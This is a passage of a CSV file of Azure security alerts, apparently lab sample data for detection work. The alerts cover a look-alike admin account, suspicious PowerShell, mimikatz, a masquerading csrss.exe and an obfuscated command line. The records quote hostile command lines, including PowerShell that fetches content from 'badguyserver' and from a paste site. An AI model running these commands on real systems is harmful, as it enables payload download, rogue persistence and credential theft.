45,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:03,2019-01-15 09:15:03,526e34b6-6578-4fc0-9db6-e126b4d673f0,2518547570966661760_526e34b6-6578-4fc0-9db6-e126b4d673f0,Detection,Microsoft,Suspicious Account Creation Detected,Suspicious Account Creation Detected,Suspicious Account Creation Detected,"Analysis of host data on MSTICALERTSWIN1 detected creation or use of a local account adm1nistrator : this account name closely resembles a standard Windows account or group name 'administrator'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""adm1nistrator"",
""Account Session Id"": ""0x0"",
""Suspicious Process"": ""c:\\windows\\system32\\net.exe"",
""Suspicious Command Line"": ""net user adm1nistrator bob_testing /add"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x141c"",
""Suspicious Account Name"": ""adm1nistrator"",
""Similar To Account Name"": ""administrator"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""adm1nistrator"",
""Host"": {
""$ref"": ""4""
},
""Type"": ""account"",
""LogonId"": ""0x0""
},
{
""$id"": ""6"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""8"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""9"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""net.exe"",
""Type"": ""file""
},
{
""$id"": ""10"",
""ProcessId"": ""0x141c"",
""CommandLine"": ""net user adm1nistrator bob_testing /add"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:03.3338239Z"",
""ImageFile"": {
""$ref"": ""9""
},
""Account"": {
""$ref"": ""8""
},
""ParentProcess"": {
""$ref"": ""7""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""11"",
""SessionId"": ""0x0"",
""StartTimeUtc"": ""2019-01-15T09:15:03.3338239Z"",
""EndTimeUtc"": ""2019-01-15T09:15:03.3338239Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""5""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:08,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
46,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,92a2f884-5827-4fb6-acf8-b0087b76aa73,2518547570884378777_92a2f884-5827-4fb6-acf8-b0087b76aa73,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1008"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1008"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.5621222Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.5621222Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.5621222Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
47,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,4ca5c629-673c-4372-9bd3-ab7bf6d6e6f0,2518547570881721037_4ca5c629-673c-4372-9bd3-ab7bf6d6e6f0,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x14e0"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x14e0"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.8278962Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.8278962Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.8278962Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
48,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,029c9c95-c1fe-4419-bc3b-a6d832c87e65,2518547570862568702_029c9c95-c1fe-4419-bc3b-a6d832c87e65,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.'",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x8e4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x8e4"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.7431297Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.7431297Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.7431297Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
49,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:14,2019-01-15 09:15:14,3ca6ca5a-8bf2-417f-b8c9-3cea37c84f4b,2518547570852901341_3ca6ca5a-8bf2-417f-b8c9-3cea37c84f4b,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x10fc"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x10fc"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:14.7098658Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:14.7098658Z"",
""EndTimeUtc"": ""2019-01-15T09:15:14.7098658Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
50,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,bddac8c5-cba5-4da2-a6dd-c0a39fc2b256,2518547570860979996_bddac8c5-cba5-4da2-a6dd-c0a39fc2b256,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1038"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1038"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.9020003Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.9020003Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.9020003Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
51,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:11,2019-01-15 09:15:11,c1a9004f-7f64-4144-8ce0-8f76f9041703,2518547570880067443_c1a9004f-7f64-4144-8ce0-8f76f9041703,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the commandline.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xb10"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xb10"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:11.9932556Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:11.9932556Z"",
""EndTimeUtc"": ""2019-01-15T09:15:11.9932556Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
52,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,c6f3dea2-fe36-4e65-b161-1b1cd1104eb3,2518547570865502616_c6f3dea2-fe36-4e65-b161-1b1cd1104eb3,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x13bded7"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1684"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1684"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 09:15:18,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
53,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 09:15:13,2019-01-15 09:15:13,9d5e263f-55d2-441f-acf4-bf569b4cd976,2518547570865502616_9d5e263f-55d2-441f-acf4-bf569b4cd976,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often use this process name to masquerade its malicious activity.,Medium,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1684"",
""account logon id"": ""0x13bded7"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x165c"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x165c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x13bded7""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1684"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x13bded7"",
""StartTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""EndTimeUtc"": ""2019-01-15T09:15:13.4497383Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
